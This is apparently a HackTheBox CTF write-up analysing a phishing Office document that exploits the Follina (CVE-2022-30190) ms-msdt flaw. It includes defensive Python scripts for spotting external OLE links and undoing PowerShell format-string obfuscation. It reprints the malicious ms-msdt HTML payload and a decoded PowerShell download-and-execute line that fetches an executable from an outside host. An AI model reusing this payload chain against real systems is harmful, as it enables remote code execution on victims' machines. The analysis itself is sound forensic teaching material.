Tags: forensics, free, medium

Diagnostic

hackthebox

Task: Analyze a malicious Office document from a phishing campaign to extract the hidden flag. Solution: Unzip the DOCX to find an external OLE object referencing an HTML file that exploits CVE-2022-30190 (Follina) via ms-msdt:/ protocol, decode the base64 PowerShell payload, and deobfuscate format string reordering to reveal the flag embedded in the malware filename.

Techniques: base64 decoding, msdt protocol handler RCE, external OLE reference, PowerShell format string deobfuscation

Diagnostic - HackTheBox

Description

Our SOC has identified numerous phishing emails coming in claiming to have a document about an upcoming round of layoffs in the company. The emails all contain a link to diagnostic.htb/layoffs.doc. The DNS for that domain has since stopped resolving, but the server is still hosting the malicious document. Take a look and figure out what's going on.

Analysis

This challenge involves analyzing a malicious Office document that exploits CVE-2022-30190 (Follina vulnerability). The attack chain:

  1. Phishing email with link to malicious .doc file
  2. Document contains external OLE object reference to HTML file
  3. HTML file uses ms-msdt:/ protocol handler to execute PowerShell
  4. PowerShell payload is base64 encoded and uses format string obfuscation
  5. Flag is hidden in the filename of the downloaded malware

Solution

Step 1: Download the malicious document

Since DNS no longer resolves, send the request to the server's IP address and supply the Host header so the virtual host still matches:

curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/layoffs.doc -o layoffs.doc

Step 2: Identify file type

file layoffs.doc
Output: layoffs.doc: Zip archive data, at least v2.0 to extract

The .doc extension is misleading - this is actually a DOCX file (Office Open XML format, which is a ZIP archive).

Step 3: Extract and analyze document structure

unzip layoffs.doc -d extracted/

Directory structure:

extracted/
├── [Content_Types].xml
├── _rels/
├── docProps/
└── word/
    ├── document.xml
    ├── _rels/
    │   └── document.xml.rels
    └── ...

Step 4: Find external OLE object reference

In word/document.xml there is an OLEObject element with suspicious attributes:

  • Type="Link" - External reference
  • ProgID="htmlfile" - Will be handled by HTML handler
  • References rId996

In word/_rels/document.xml.rels:

<Relationship Id="rId996" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>

Key indicator: External OLE object pointing to HTML file - classic Follina setup.
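A triage script for the Step 4 check, added here as an example and not part of the original writeup: it walks every .rels part of an OOXML package and reports relationships whose TargetMode is External, then filters for the oleObject type. The sample package is constructed in memory with the rId996 relationship shown above plus an ordinary external hyperlink, which is also "External" and is why the type filter matters.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"

def external_relationships(docx_bytes):
    """Return (part, rId, type, target) for every relationship with
    TargetMode="External", across all *.rels parts (DOCX/XLSX/PPTX)."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") == "External":
                    hits.append((name, rel.get("Id"), rel.get("Type"), rel.get("Target")))
    return hits

def external_ole_targets(docx_bytes):
    """The Follina-style indicator: OLE objects linked to a remote target."""
    return [t for (_, _, typ, t) in external_relationships(docx_bytes) if typ == OLE_TYPE]

# Constructed sample: document.xml.rels carries the rId996 relationship from the
# writeup plus a benign external hyperlink (rId1) that must not be flagged as OLE.
SAMPLE_RELS = "".join([
    '<?xml version="1.0" encoding="UTF-8"?>',
    f'<Relationships xmlns="{REL_NS}">',
    f'<Relationship Id="rId1" Type="{HYPERLINK_TYPE}" Target="https://example.com/" TargetMode="External"/>',
    f'<Relationship Id="rId996" Type="{OLE_TYPE}" Target="http://diagnostic.htb/223_index_style_fancy.html!" TargetMode="External"/>',
    "</Relationships>",
])

def build_sample_docx():
    """Build a minimal in-memory package with the constructed rels part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()

if __name__ == "__main__":
    for part, rid, typ, target in external_relationships(build_sample_docx()):
        label = "OLE LINK" if typ == OLE_TYPE else "external"
        print(f"{part}: {rid} [{label}] -> {target}")
```

Point it at a real file with `external_relationships(open("layoffs.doc", "rb").read())`; any oleObject hit pointing at an HTTP target is the Step 4 indicator.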

Step 5: Download the external HTML payload

curl -H "Host: diagnostic.htb" http://94.237.59.242:45434/223_index_style_fancy.html -o payload.html

Step 6: Analyze the HTML payload

The HTML contains JavaScript that triggers the MSDT protocol handler:

<script> location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JHtmYGlsZX0gPSAo...base64...'))))))...\""; </script>

This exploits CVE-2022-30190 (Follina):

  • Uses ms-msdt:/ protocol to invoke Microsoft Support Diagnostic Tool
  • Passes PowerShell commands via IT_BrowseForFile parameter
  • The $() subexpression syntax causes PowerShell to evaluate the embedded command when MSDT processes the parameter

Step 7: Decode the base64 PowerShell payload

echo 'JHtmYGlsZX0gPSAoIns3fXsxfXs2fXs4fXs1fXszfXsyfXs0fXswfSItZid9LmV4ZScsJ0J7bXNEdF80c19BX3ByMCcsJ0UnLCdyLi4ucycsJzNNc19iNEQnLCdsMycsJ3RvQycsJ0hUJywnMGxfaDRuRCcpCiYoInsxfXsyfXswfXszfSItZid1ZXMnLCdJbnZva2UnLCctV2ViUmVxJywndCcpICgiezJ9ezh9ezB9ezR9ezZ9ezV9ezN9ezF9ezd9Ii1mICc6Ly9hdScsJy5odGIvMicsJ2gnLCdpYycsJ3RvJywnYWdub3N0JywnbWF0aW9uLmRpJywnL24uZXhlJywndHRwcycpIC1PdXRGaWxlICJDOlxXaW5kb3dzXFRhc2tzXCRmaWxlIgomKCgoIns1fXs2fXsyfXs4fXswfXszfXs3fXs0fXsxfSIgLWYnTDlGVGFza3NMOUYnLCdpbGUnLCdvdycsJ0wnLCdmJywnQzonLCdMOUZMOUZXaW5kJywnOUZrekgnLCdzTDlGJykpICAtQ1JlcGxBY2Una3pIJyxbY2hBcl0zNiAtQ1JlcGxBY2UoW2NoQXJdNzYrW2NoQXJdNTcrW2NoQXJdNzApLFtjaEFyXTkyKQo=' | base64 -d

Decoded (obfuscated PowerShell):

${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r...s','3Ms_b4D','l3','toC','HT','0l_h4nD') &("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file" &((("{5}{6}{2}{8}{0}{3}{7}{4}{1}" -f'L9FTasksL9F','ile','ow','L','f','C:','L9FL9FWind','9FkzH','sL9F')) -CReplAce'kzH',[chAr]36 -CReplAce([chAr]76+[chAr]57+[chAr]70),[chAr]92)

Step 8: Deobfuscate the PowerShell format strings

PowerShell's -f operator reorders string fragments by index. Using Python to reconstruct:

# Filename reconstruction
parts = ['}.exe', 'B{msDt_4s_A_pr0', 'E', 'r...s', '3Ms_b4D', 'l3', 'toC', 'HT', '0l_h4nD']
order = [7, 1, 6, 8, 5, 3, 2, 4, 0]
filename = ''.join(parts[i] for i in order)
# Result: HTB{msDt_4s_A_pr0toC0l_h4nDl3r...sE3Ms_b4D}.exe

# URL reconstruction
parts2 = ['://au', '.htb/2', 'h', 'ic', 'to', 'agnost', 'mation.di', '/n.exe', 'ttps']
order2 = [2, 8, 0, 4, 6, 5, 3, 1, 7]
url = ''.join(parts2[i] for i in order2)
# Result: https://automation.diagnostic.htb/2/n.exe

Deobfuscated payload behavior:

  1. Sets $file to HTB{msDt_4s_A_pr0toC0l_h4nDl3r...sE3Ms_b4D}.exe
  2. Downloads malware from https://automation.diagnostic.htb/2/n.exe
  3. Saves to C:\Windows\Tasks\<filename>
  4. Executes the downloaded file

The flag was hidden in the malware filename!
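A more general form of the Step 8 reconstruction, added as an example and not the writeup's own script: instead of hand-copying each parts list, it finds every "{i}{j}..." -f expression in the decoded payload (all four, not only the two done above) and replaces it with the literal PowerShell would produce, and folds [char]N and ([char]A+[char]B) arithmetic into quoted literals so the -creplace arguments become readable. SAMPLE is the decoded payload from Step 7, embedded as constructed input.

```python
import re

# "{7}{1}..." -f 'a','b',...  : a format string followed by single-quoted arguments
FMT_RE = re.compile(r'''"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,?\s*)+)''')
ARG_RE = re.compile(r"'([^']*)'")
IDX_RE = re.compile(r"\{(\d+)\}")
# [char]36  or  ([char]76+[char]57+[char]70); case-insensitive like PowerShell
CHAR_RE = re.compile(r"\(\[char\]\d+(?:\s*\+\s*\[char\]\d+)+\)|\[char\]\d+", re.I)

def apply_format(fmt, args):
    """Resolve one "{i}{j}..." -f args expression the way PowerShell's -f does."""
    return "".join(args[int(i)] for i in IDX_RE.findall(fmt))

def deobfuscate(script):
    """Replace every -f expression and every [char] sum with the literal it yields."""
    def fmt_sub(m):
        return "'" + apply_format(m.group(1), ARG_RE.findall(m.group(2))) + "'"
    def char_sub(m):
        codes = re.findall(r"\[char\](\d+)", m.group(0), re.I)
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return CHAR_RE.sub(char_sub, FMT_RE.sub(fmt_sub, script))

# Constructed sample: the base64-decoded payload from Step 7, verbatim.
SAMPLE = r"""${f`ile} = ("{7}{1}{6}{8}{5}{3}{2}{4}{0}"-f'}.exe','B{msDt_4s_A_pr0','E','r...s','3Ms_b4D','l3','toC','HT','0l_h4nD') &("{1}{2}{0}{3}"-f'ues','Invoke','-WebReq','t') ("{2}{8}{0}{4}{6}{5}{3}{1}{7}"-f '://au','.htb/2','h','ic','to','agnost','mation.di','/n.exe','ttps') -OutFile "C:\Windows\Tasks\$file" &((("{5}{6}{2}{8}{0}{3}{7}{4}{1}" -f'L9FTasksL9F','ile','ow','L','f','C:','L9FL9FWind','9FkzH','sL9F')) -CReplAce'kzH',[chAr]36 -CReplAce([chAr]76+[chAr]57+[chAr]70),[chAr]92)"""

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
```

The resolved script still carries the two -creplace calls, now as 'kzH' -> '$' and 'L9F' -> '\', so the execution line reads as the C:\Windows\Tasks\$file path described above.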

Key Indicators

Use this technique when you see:

  • .doc files that are actually ZIP archives (DOCX format)
  • External OLE object references in Office documents
  • ProgID="htmlfile" in OLE objects
  • ms-msdt:/ protocol in HTML/JavaScript
  • Base64 encoded PowerShell payloads
  • PowerShell format string obfuscation (-f operator with reordered indices)

Attack Chain Summary

Phishing Email
    ↓
layoffs.doc (DOCX with external OLE reference)
    ↓
223_index_style_fancy.html (JavaScript redirect)
    ↓
ms-msdt:/ protocol handler (CVE-2022-30190)
    ↓
PowerShell execution (base64 + format string obfuscation)
    ↓
Download & execute malware from C2 server
